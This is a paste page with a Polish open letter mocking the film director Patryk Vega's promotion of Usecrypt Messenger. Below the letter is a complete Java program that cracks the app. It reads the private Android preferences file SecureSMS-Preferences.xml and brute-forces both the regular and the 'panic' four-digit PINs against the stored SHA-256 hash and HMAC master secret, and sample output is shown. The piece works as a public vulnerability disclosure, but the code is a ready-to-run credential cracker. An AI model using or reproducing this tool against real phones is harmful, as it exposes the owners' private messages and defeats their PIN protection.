Facebook
From student2roku, 2 Years ago, written in Java 5.
Embed
Download Paste or View Raw
Hits: 13974
 1. /*
 2.  
 3. List otwarty do Patryka Vegi
 4.  
 5. Drogi Patryku. Ustalmy na wstepie - jestes rezyserem i znasz sie na branzy filmowej. Nie znasz sie
 6. na komputerach, sieciach ani tym bardziej kryptografii. Reklamujesz Usecrypt Messengera i niestety
 7. twoi nowi koledzy robia z Ciebie debila.
 8.  
 9. Mowisz, ze fachowcy z Mossadu zabrali telefon z Usecryptem i nie odzywali sie przez dwa miesiace. Wiesz
 10. czemu? Bo przez bite dwa miesiace nie mogli przestac sie smiac. Zlamanie zabezpieczen Usecrypt Messengera
 11. to nie zadanie dla Mossadu tylko dla mnie, studenta drugiego roku informatyki.
 12.  
 13. Patryku, nie mam dla ciebie dobrych wiadomosci. Jesli zlosliwe oprogramowanie odczyta plik
 14. /data/data/uc.messenger/shared_prefs/SecureSMS-Preferences.xml z twojego telefonu z Androidem, a to naprawde
 15. latwe gdy jest sie zlosliwym oprogramowaniem, to oba PIN-y (ten zwykly i ten paniczny) stoja otworem.
 16.  
 17. Wiem, ze ciezko bedzie Ci w to uwierzyc, wiec zalaczam program za pomoca ktorego mozna zlamac zabezpieczenia
 18. Usecrypt Messengera. Potrzebuje on do dzialania pliku SecureSMS-Preferences.xml z prywatnego katalogu Usecrypt
 19. Messengera. Uruchamiasz program z nazwa tego pliku jako parametrem, czekasz krotka chwile i dostajesz na
 20. ekranie najpierw Panic PIN a potem PIN.
 21.  
 22. Serdecznie Cie pozdrawiam
 23. Student II roku (nie napisze, ktorej uczelni)
 24.  
 25. PS: nie reklamuj wiecej komunikatorow, OK?
 26.  
 27.  
 28. ----
 29.  
 30. Do uruchomienia niniejszego programu potrzebujesz bibliotek
 31.  
 32. Google_Protocol_Buffers_support_0.5.9
 33. axolotl-java-1.4.2
 34. protobuf-java-2.5.0
 35. curve25519-java-0.2.4
 36. org.bouncycastle:bcprov-ext-jdk14:1.51
 37.  
 38. ----
 39. Przykladowe uruchomienie:
 40.  
 41. Usecrypt Messenger mega h@x0r double PIN cracker
 42. Looking for PANIC PIN, max: 9999
 43. checking 3333
 44. PANIC PIN found: 3333
 45. Looking for PIN, max: 9999
 46. checking 1111
 47. PIN found: 1111
 48.  
 49.  
 50. */
 51.  
 52. import org.bouncycastle.jce.provider.BouncyCastleProvider;
 53. import org.bouncycastle.util.encoders.Base64;
 54. import org.w3c.dom.Document;
 55. import org.w3c.dom.Element;
 56. import org.w3c.dom.Node;
 57. import org.whispersystems.libaxolotl.IdentityKey;
 58. import org.whispersystems.libaxolotl.InvalidKeyException;
 59. import javax.crypto.Mac;
 60. import javax.crypto.SecretKeyFactory;
 61. import javax.crypto.spec.PBEKeySpec;
 62. import javax.crypto.spec.SecretKeySpec;
 63. import javax.xml.parsers.DocumentBuilder;
 64. import javax.xml.parsers.DocumentBuilderFactory;
 65. import java.io.File;
 66. import java.security.MessageDigest;
 67. import java.security.NoSuchAlgorithmException;
 68. import java.security.Security;
 69. import java.util.Arrays;
 70.  
 71. public class UsecryptMessengerCracker {
 72.  
 73.     final int max_pin = 9999;
 74.  
 75.     int xml_passphrase_iterations= 20000;
 76.     String xml_master_secret=null;
 77.     String xml_pref_identity_public_v3=null;
 78.     String xml_panic_hash=null;
 79.     String xml_mac_salt=null;
 80.  
 81.     public static void main(String[] args) {
 82.         UsecryptMessengerCracker d = new UsecryptMessengerCracker();
 83.         d.crackUsecryptMessenger(args);
 84.     }
 85.  
 86.     public void crackUsecryptMessenger(String[] args) {
 87.         Security.addProvider(new BouncyCastleProvider());
 88.  
 89.         System.out.println("Usecrypt Messenger mega h@x0r double PIN cracker");
 90.  
 91.         if (args.length != 1){
 92.             System.out.println("You need to provide a Usecrypt Messenger XML file from Android phone as a parameter");
 93.             System.out.println("This is the one you need: /data/data/uc.messenger/shared_prefs/SecureSMS-Preferences.xml");
 94.             System.exit(-1);
 95.         }
 96.  
 97.         if (!new File(args[0]).exists()){
 98.             System.out.println("File does not exist: "+args[0]);
 99.             System.exit(-2);
 100.         }
 101.  
 102.         DocumentBuilderFactory dbFactory = DocumentBuilderFactory.newInstance();
 103.         try {
 104.             DocumentBuilder dBuilder = dbFactory.newDocumentBuilder();
 105.             Document doc = dBuilder.parse(new File(args[0]));
 106.  
 107.  
 108.             Element map = doc.getDocumentElement();
 109.             for (int i = 0; i < map.getChildNodes().getLength(); i++){
 110.                 Node n = map.getChildNodes().item(i);
 111.  
 112.                 String name = n.getNodeName();
 113.                 if (name.equals("string") && n.hasAttributes()  ){
 114.                     Node attrib = n.getAttributes().item(0);
 115.                     if (attrib.getNodeValue().equals("master_secret")){
 116.                         xml_master_secret = n.getTextContent();
 117.                     }
 118.                     if (attrib.getNodeValue().equals("pref_identity_public_v3")){
 119.                         xml_pref_identity_public_v3 = n.getTextContent();
 120.                     }
 121.                     if (attrib.getNodeValue().equals("panic_hash")){
 122.                         xml_panic_hash = n.getTextContent();
 123.                     }
 124.                     if (attrib.getNodeValue().equals("mac_salt")){
 125.                         xml_mac_salt = n.getTextContent();
 126.                     }
 127.                 }
 128.  
 129.                 if (name.equals("int") && n.hasAttributes()  ){
 130.                     Node attrib = n.getAttributes().item(0);
 131.                     if (attrib.getNodeValue().equals("passphrase_iterations")){
 132.                         String v = n.getAttributes().item(1).getTextContent();
 133.                         xml_passphrase_iterations = Integer.parseInt(v);
 134.                     }
 135.                 }
 136.             }
 137.         } catch (Exception e) {
 138.             System.out.println("Error parsing XML: "+e.toString());
 139.             System.exit(-3);
 140.         }
 141.  
 142.         if (xml_master_secret==null || xml_pref_identity_public_v3==null || xml_panic_hash==null || xml_mac_salt==null){
 143.             System.out.println("XML does not contain all required fields: ");
 144.             System.exit(-4);
 145.         }
 146.  
 147.         byte[] panic_hash_decoded = Base64.decode(xml_panic_hash);
 148.  
 149.  
 150.         String ret = findPanicPIN(max_pin, panic_hash_decoded, xml_pref_identity_public_v3);
 151.         if (ret != null){
 152.             System.out.println("PANIC PIN found: "+ret);
 153.         }else{
 154.             System.out.println("PANIC PIN not found");
 155.         }
 156.  
 157.         ret = findMasterSecret(max_pin, xml_master_secret, xml_mac_salt);
 158.         if (ret != null){
 159.             System.out.println("PIN found: "+ret);
 160.         }else{
 161.             System.out.println("PIN not found");
 162.         }
 163.     }
 164.  
 165.  
 166.     public String findPanicPIN(int max, byte[] panic_hash_decoded, String pref_identity_public_v3) {
 167.         System.out.println("Looking for PANIC PIN, max: "+max);
 168.  
 169.         for (int i=0; i<max+1; i++){
 170.             String s = String.valueOf(i);
 171.             System.out.print("checking ");
 172.             System.out.print(s);
 173.             System.out.print("\r");
 174.             if(validatePanicPIN(s, panic_hash_decoded, pref_identity_public_v3)){
 175.                 System.out.println("");
 176.                 return s;
 177.             }
 178.         }
 179.  
 180.         System.out.println("");
 181.  
 182.         return null;
 183.  
 184.     }
 185.  
 186.     public boolean validatePanicPIN(String pin, byte[] panic_hash_decoded, String pref_identity_public_v3)  {
 187.  
 188.         byte[] b2 = new byte[0];
 189.         try {
 190.             b2 = getHashFromPassphrase(new IdentityKey(Base64.decode(pref_identity_public_v3), 0).serialize(), pin);
 191.         } catch (InvalidKeyException e) {
 192.             e.printStackTrace();
 193.         }
 194.  
 195.         if (Arrays.equals(panic_hash_decoded,b2)) {
 196.             return true;
 197.         }else{
 198.             return false;
 199.         }
 200.     }
 201.  
 202.  
 203.     private static byte[] getHashFromPassphrase(byte[] var0, String var1) {
 204.         byte[] var3 = var1.getBytes();
 205.         byte[] var2 = new byte[var3.length + var0.length];
 206.         System.arraycopy(var3, 0, var2, 0, var3.length);
 207.         System.arraycopy(var0, 0, var2, var3.length, var0.length);
 208.         byte[] var01 = var2;
 209.         try {
 210.             MessageDigest var11 = MessageDigest.getInstance("SHA-256");
 211.             var11.update(var01);
 212.             var01 = var11.digest();
 213.         } catch (NoSuchAlgorithmException var21) {
 214.             var01 = null;
 215.         }
 216.  
 217.         return var01;
 218.     }
 219.  
 220.     public String findMasterSecret(int max, String master_secret, String mac_salt) {
 221.         System.out.println("Looking for PIN, max: "+max);
 222.  
 223.         byte[] master_secret_decoded = Base64.decode(master_secret);
 224.         byte[] mac_salt_decoded = Base64.decode(mac_salt);
 225.  
 226.         for (int i=0; i<max+1; i++){
 227.             String candidatePass = String.valueOf(i); // in case of alphanum passwords, try different candidates values here
 228.             System.out.print("checking ");
 229.             System.out.print(candidatePass);
 230.             System.out.print("\r");
 231.             if(true == verifyMasterPIN(candidatePass, master_secret_decoded, mac_salt_decoded, xml_passphrase_iterations)){
 232.                 System.out.println("");
 233.                 return candidatePass;
 234.             }
 235.         }
 236.         System.out.println("");
 237.         return null;
 238.     }
 239.  
 240.  
 241.     public boolean verifyMasterPIN(String pin, byte[] master_secret_decoded, byte[] mac_salt_decoded, int passphrase_iterations)  {
 242.  
 243.         try {
 244.             int var4 = passphrase_iterations;
 245.             byte[] var0 = mac_salt_decoded;
 246.             PBEKeySpec var32 = new PBEKeySpec(pin.toCharArray(), var0, var4);
 247.             SecretKeySpec var41 = new SecretKeySpec(SecretKeyFactory.getInstance("PBEWITHSHA1AND128BITAES-CBC-BC").generateSecret(var32).getEncoded(), "HmacSHA1");
 248.             Mac var31 = Mac.getInstance("HmacSHA1");
 249.             var31.init(var41);
 250.             Mac var411 = var31;
 251.             var0 = new byte[master_secret_decoded.length - var411.getMacLength()];
 252.             System.arraycopy(master_secret_decoded, 0, var0, 0, var0.length);
 253.             byte[] var5 = new byte[var411.getMacLength()];
 254.             System.arraycopy(master_secret_decoded, master_secret_decoded.length - var411.getMacLength(), var5, 0, var5.length);
 255.             if (Arrays.equals(var5, var411.doFinal(var0))) {
 256.                 return true;
 257.             } else {
 258.                 return false;
 259.             }
 260.         } catch (Exception e) {
 261.             //System.out.println(e.toString());
 262.             return false;
 263.         }
 264.  
 265.     }
 266.  
 267.  
 268. }
 269.  

Replies to UsecryptMessengerCracker rss

Title Name Language When
Re: UsecryptMessengerCracker Burly Prairie Dog java5 2 Years ago.
Skupmy się na _prawdziwych_ problemach Zatroskany o łamanie GPL text 2 Years ago.
Re: UsecryptMessengerCracker Zatroskany o wiedzę studenta java5 2 Years ago.
Nic specjalnego Nie ma sie czym podniecac text 2 Years ago.
Słabe to Juzek text 2 Years ago.
Re: UsecryptMessengerCracker Walloping Gorilla java5 2 Years ago.
Re: UsecryptMessengerCracker Maszariusz java5 2 Years ago.
Re: UsecryptMessengerCracker Beefy Pig java5 2 Years ago.
Re: UsecryptMessengerCracker nauczyciel java5 2 Years ago.
Re: UsecryptMessengerCracker Zięć java5 2 Years ago.